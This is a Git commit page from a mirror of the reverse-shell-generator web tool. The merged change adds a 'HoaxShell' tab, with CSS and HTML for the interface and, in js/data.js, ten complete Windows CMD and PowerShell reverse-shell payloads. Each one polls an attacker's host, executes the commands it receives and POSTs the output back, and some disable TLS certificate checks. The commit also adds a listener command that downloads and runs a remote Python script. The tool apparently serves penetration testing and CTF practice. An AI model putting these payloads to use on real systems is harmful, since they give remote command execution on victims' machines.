ch0ic3/reverse-shell-generator
1
0
Fork 0
mirror of https://github.com/0dayCTF/reverse-shell-generator.git synced 2025-01-30 22:35:13 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #112 from t3l3machus/main

Browse Source 
Added HoaxShell
This commit is contained in:
Ryan Montgomery 2023-02-16 12:06:28 -05:00 committed by GitHub
commit 659ae03dee
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 197 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
css/dark-mode.css
View File

@ -69,6 +69,14 @@ _:-ms-fullscreen, :root body {
max-height: 20rem;
}
#hoaxshell-command {
border: none !important;
border-radius: 5px;
box-shadow: 10px 10px 20px 0px rgba(0, 0, 0, 0.75);
background-color: rgb(70, 70, 70);
max-height: 20rem;
}
#theme-selector {
width: 100px;
height: 30px;
@ -136,4 +144,4 @@ h2 {
.github-corner .octo-arm {
animation: octocat-wave 560ms ease-in-out
}
}
}

9
css/light-mode.css
View File

@ -103,6 +103,15 @@ Ain't got time for using CSS the right way. !important everything!
max-height: 20rem;
}
[data-theme="light"] #hoaxshell-command {
border: none !important;
border-radius: 5px;
box-shadow: 10px 10px 20px 0px rgba(209, 209, 209, 0.75);
background-color: rgb(45, 139, 135);
color: #000;
max-height: 20rem;
}
[data-theme="light"] .custom-select {
background-color: #f2f2f2;
color: #000;

11
css/meme-mode.css
View File

@ -108,6 +108,15 @@ Ain't got time for using CSS the right way. !important everything!
max-height: 20rem;
}
[data-theme="meme"] #hoaxshell-command {
border: none !important;
border-radius: 5px;
box-shadow: 10px 10px 20px 0px rgba(153, 28, 143, 0.75);
background-color: rgb(45, 139, 135);
color: #000;
max-height: 20rem;
}
[data-theme="meme"] .custom-select {
background-color: #f1c6ce;
color: #000;
@ -330,4 +339,4 @@ Ain't got time for using CSS the right way. !important everything!
100% {
color: orange;
}
}
}

59
index.html
View File

@ -192,6 +192,10 @@
<a class="nav-link" id="msfvenom-tab" data-toggle="tab" href="#msfvenom" role="tab"
aria-controls="msfvenom" aria-selected="false">MSFVenom</a>
</li>
<li class="nav-item">
<a class="nav-link" id="hoaxshell-tab" data-toggle="tab" href="#hoaxshell" role="tab"
aria-controls="msfvenom" aria-selected="false">HoaxShell</a>
</li>
<!-- <li class="nav-item">
<a class="nav-link disabled" id="settings-tab" data-toggle="tab" href="#settings" role="tab"
aria-controls="settings" aria-selected="false" aria-disabled="true">Settings</a>
@ -447,7 +451,60 @@
</div>
</div>
</div>
<!-- /MSFVenom Tab -->
</div>
<!-- /MSFVenom Tab -->
<!-- HoaxShell Tab -->
<div class="tab-pane" id="hoaxshell" role="tabpanel" aria-labelledby="hoaxshell-tab">
<div class="card shadow mb-5">
<div class="card-body">
<img src="assets/floppy-disk-solid.svg" class="download-svg float-right" data-toggle="tooltip" title="Download Payload">
<div class="card-text mt-4">
<div class="row">
<!-- Left column: HoaxShell selection -->
<div class="col-12 col-md-3">
<div id="hoaxshell-selection" class="list-group overflow-auto"
style="max-height: 520px">
<!-- filled by init()-->
</div>
</div>
<!-- Right column -->
<div class="col-12 col-md-9 d-flex flex-column">
<!-- Command -->
<div class="row flex-grow-1">
<div class="col position-relative">
<pre class="prompt-sign">🚀</pre>
<pre id="hoaxshell-command"
class="bg-dark border pre-wrap text-break p-4 pl-5" spellcheck="false"
style="outline: none; font-size:1em;" contenteditable="true"></pre>
</div>
</div>
<div class="row justify-content-end mr-1">
<!-- Download button -->
<a href="https://github.com/t3l3machus/hoaxshell/tree/main/revshells" target="_blank"><button type="button" class="btn btn-primary float-right mr-3"
data-toggle="tooltip" title="Download Listener">
Download Listener
</button></a>
<!-- Copy button -->
<button id="copy-hoaxshell-command" data-toggle="tooltip"
title="Copy to clipboard" type="button"
class="btn btn-primary float-right">
Copy
</button>
</div>
</div>
<!-- /Right column -->
</div>
</div>
</div>
</div>
</div>
<!-- /hoaxshell Tab -->
</div>
<!-- RSG data -->

85
js/data.js
View File

@ -2,7 +2,8 @@
const CommandType = {
'ReverseShell': 'ReverseShell',
'BindShell': 'BindShell',
'MSFVenom': 'MSFVenom'
'MSFVenom': 'MSFVenom',
'HoaxShell': 'HoaxShell'
};
const withCommandType = function (commandType, elements) {
@ -471,11 +472,68 @@ const msfvenomCommands = withCommandType(
]
);
const hoaxShellCommands = withCommandType(
CommandType.HoaxShell,
[
{
"name": "Windows CMD cURL",
"command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
"meta": ["windows"]
},
{
"name": "PowerShell IEX",
"command": "$s='{ip}:{port}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
"meta": ["windows"]
},
{
"name": "PowerShell IEX Constr Lang Mode",
"command": "$s='{ip}:{port}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
"meta": ["windows"]
},
{
"name": "PowerShell Outfile",
"command": "$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
"meta": ["windows"]
},
{
"name": "PowerShell Outfile Constr Lang Mode",
"command": "$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
"meta": ["windows"]
},
{
"name": "Windows CMD cURL https",
"command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=https://&&curl -fs -k !protocol!!ip!/eb6a44aa -H !sid! > NUL & for /L %i in (0) do (curl -fs -k !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl -fs -k !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
"meta": ["windows"]
},
{
"name": "PowerShell IEX https",
"command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
"meta": ["windows"]
},
{
"name": "PowerShell Constr Lang Mode IEX https",
"command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
"meta": ["windows"]
},
{
"name": "PowerShell Outfile https",
"command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
"meta": ["windows"]
},
{
"name": "PowerShell Outfile Constr Lang Mode https",
"command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
"meta": ["windows"]
}
]
);
const rsgData = {
listenerCommands: [
['nc', 'nc -lvnp {port}'],
['busybox nc', 'busybox nc -lp {port}'],
['busybox nc', 'busybox nc -lp {port}'],
['ncat', 'ncat -lvnp {port}'],
['ncat.exe', 'ncat.exe -lvnp {port}'],
['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
@ -487,7 +545,8 @@ const rsgData = {
['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
['powercat', 'powercat -l -p {port}'],
['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'],
['hoaxshell', 'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}']
],
shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'],
@ -501,9 +560,25 @@ const rsgData = {
reverseShellCommands: [
...reverseShellCommands,
...bindShellCommands,
...msfvenomCommands
...msfvenomCommands,
...hoaxShellCommands
]
}
};
const hoaxshell_listener_types = {
"Windows CMD cURL" : "cmd-curl",
"PowerShell IEX" : "ps-iex",
"PowerShell IEX Constr Lang Mode" : "ps-iex-cm",
"PowerShell Outfile" : "ps-outfile",
"PowerShell Outfile Constr Lang Mode" : "ps-outfile-cm",
"Windows CMD cURL https" : "cmd-curl -c /your/cert.pem -k /your/key.pem",
"PowerShell IEX https" : "ps-iex -c /your/cert.pem -k /your/key.pem",
"PowerShell IEX Constr Lang Mode https" : "ps-iex-cm -c /your/cert.pem -k /your/key.pem",
"PowerShell Outfile https" : "ps-outfile -c /your/cert.pem -k /your/key.pem",
"PowerShell Outfile Constr Lang Mode https" : "ps-outfile-cm -c /your/cert.pem -k /your/key.pem"
};
// Export the data for use within netlify functions / node
if (typeof exports !== 'undefined') {

31
js/script.js
View File

@ -10,6 +10,7 @@ const listenerCommand = document.querySelector("#listener-command");
const reverseShellCommand = document.querySelector("#reverse-shell-command");
const bindShellCommand = document.querySelector("#bind-shell-command");
const msfVenomCommand = document.querySelector("#msfvenom-command");
const hoaxShellCommand = document.querySelector("#hoaxshell-command");
const FilterType = {
'All': 'all',
@ -54,6 +55,15 @@ encoding: "None"
});
});
document.querySelector("#hoaxshell-tab").addEventListener("click", () => {
document.querySelector("#hoaxshell-selection").innerHTML = "";
rsg.setState({
commandType: CommandType.HoaxShell,
encoding: "None"
});
});
var rawLinkButtons = document.querySelectorAll('.raw-listener');
for (const button of rawLinkButtons) {
button.addEventListener("click", () => {
@ -93,6 +103,7 @@ const rsg = {
ip: query.get('ip') || localStorage.getItem('ip') || '10.10.10.10',
port: query.get('port') || localStorage.getItem('port') || 9001,
payload: query.get('payload') || localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp',
payload: query.get('type') || localStorage.getItem('type') || 'cmd-curl',
shell: query.get('shell') || localStorage.getItem('shell') || rsgData.shells[0],
listener: query.get('listener') || localStorage.getItem('listener') || rsgData.listenerCommands[0][1],
encoding: query.get('encoding') || localStorage.getItem('encoding') || 'None',
@ -100,6 +111,7 @@ const rsg = {
[CommandType.ReverseShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.ReverseShell })[0].name,
[CommandType.BindShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.BindShell })[0].name,
[CommandType.MSFVenom]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.MSFVenom })[0].name,
[CommandType.HoaxShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.HoaxShell })[0].name,
},
commandType: CommandType.ReverseShell,
filter: FilterType.All,
@ -116,6 +128,10 @@ const rsg = {
[CommandType.MSFVenom]: {
listSelection: '#msfvenom-selection',
command: '#msfvenom-command'
},
[CommandType.HoaxShell]: {
listSelection: '#hoaxshell-selection',
command: '#hoaxshell-command'
}
},
@ -169,6 +185,16 @@ const rsg = {
},
getType: () => {
if (rsg.commandType === 'HoaxShell') {
let cmd_name = rsg.getSelectedCommandName();
return hoaxshell_listener_types[cmd_name];
}
return 'cmd-curl'
},
generateReverseShellCommand: () => {
let command
@ -358,6 +384,7 @@ const rsg = {
command = command.replace('{port}', rsg.getPort())
command = command.replace('{ip}', rsg.getIP())
command = command.replace('{payload}', rsg.getPayload())
command = command.replace('{type}', rsg.getType())
if (rsg.getPort() < 1024) {
privilegeWarning.style.visibility = "visible";
@ -456,6 +483,10 @@ document.querySelector('#copy-msfvenom-command').addEventListener('click', () =>
rsg.copyToClipboard(msfVenomCommand.innerText)
})
document.querySelector('#copy-hoaxshell-command').addEventListener('click', () => {
rsg.copyToClipboard(hoaxShellCommand.innerText)
})
var downloadButton = document.querySelectorAll(".download-svg");
for (const Dbutton of downloadButton) {
Dbutton.addEventListener("click", () => {